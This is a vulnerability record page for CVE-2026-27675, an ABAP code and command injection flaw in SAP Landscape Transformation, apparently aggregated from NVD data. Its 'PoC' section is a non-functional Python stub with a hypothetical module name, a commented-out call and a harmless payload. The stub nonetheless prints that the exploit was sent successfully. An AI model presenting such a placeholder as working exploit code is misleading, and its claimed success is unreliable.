CVE-2026-27675

Description

SAP Landscape Transformation contains a vulnerability in an RFC-exposed function module that could allow a high privileged adversary to inject arbitrary ABAP code and operating system commands. Due to this, some information could be modified, but the attacker does not have control over kind or degree. This leads to a low impact on integrity, while confidentiality and availability are not impacted.

CVSS Details

CVSS Score

2.0

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SAP Landscape Transformation (具体受影响版本请参考 SAP Note 3723097)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# This is a conceptual PoC for CVE-2026-27675
# Requires a library capable of making SAP RFC calls (e.g., PyRFC)

import sys

def exploit_sap_landscape(target_host, target_sysnr, user, password, client):
    """
    Conceptual PoC to demonstrate ABAP Code Injection via vulnerable RFC module.
    """
    try:
        # Simulate connection to the SAP system
        print(f"[*] Connecting to {target_host} system {client}...")
        
        # The vulnerable RFC module name (hypothetical based on description)
        rfc_module = "Z_VULNERABLE_LTRANS_FUNC"
        
        # Malicious payload to inject ABAP code
        # This attempts to execute a system command or modify data
        payload = "WRITE: / 'CVE-2026-27675 Exploit Executed'."
        
        print(f"[*] Sending payload to {rfc_module}...")
        print(f"[*] Payload: {payload}")
        
        # In a real scenario, this would trigger the execution
        # result = conn.call(rfc_module, INJECTION_PARAM=payload)
        
        print("[+] Exploit sent successfully.")
        print("[!] Note: High privileges and User Interaction are required.")
        
    except Exception as e:
        print(f"[-] Error during exploitation: {e}")

if __name__ == "__main__":
    # Usage: python poc.py <host> <sysnr> <user> <pass> <client>
    # exploit_sap_landscape("10.0.0.1", "00", "ADMIN", "PASSWORD", "000")
    pass

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-27675
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-27675
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-27675/
[4] VulDB https://vuldb.com/cve/CVE-2026-27675
[5] https://me.sap.com/notes/3723097
[6] https://url.sap/sapsecuritypatchday

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-27675", "sourceIdentifier": "[email protected]", "published": "2026-04-14T00:16:05.823", "lastModified": "2026-04-17T15:18:16.507", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "SAP Landscape Transformation contains a vulnerability in an RFC-exposed function module that could allow a high privileged adversary to inject arbitrary ABAP code and operating system commands. Due to this, some information could be modified, but the attacker does not have control over kind or degree. This leads to a low impact on integrity, while confidentiality and availability are not impacted."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:N", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.5, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://me.sap.com/notes/3723097", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}